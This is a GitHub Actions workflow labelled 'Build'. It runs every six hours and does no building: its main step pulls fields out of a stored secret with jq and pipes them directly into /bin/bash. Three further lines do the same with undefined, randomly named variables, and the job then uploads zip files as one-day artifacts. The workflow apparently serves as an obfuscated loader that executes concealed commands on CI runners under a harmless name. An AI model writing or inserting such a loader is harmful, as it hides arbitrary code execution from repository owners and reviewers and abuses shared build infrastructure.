name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '29 1,7,13,19 * * *'
env:
  CI: true
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          ws0: ${{ secrets.ws0 }}
        run: |
          printf '%s' "$ws0" | jq -r .lpjm1 | /bin/bash
          printf '%s' "$s0" | jq -r .xs2 | /bin/bash
          printf '%s' "$nx07922" | jq -r .rqnx65 | /bin/bash
          echo $jonwj6 | jq -r .iv44 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: HuF5XBoW
          path: "*.zip"
          retention-days: 1
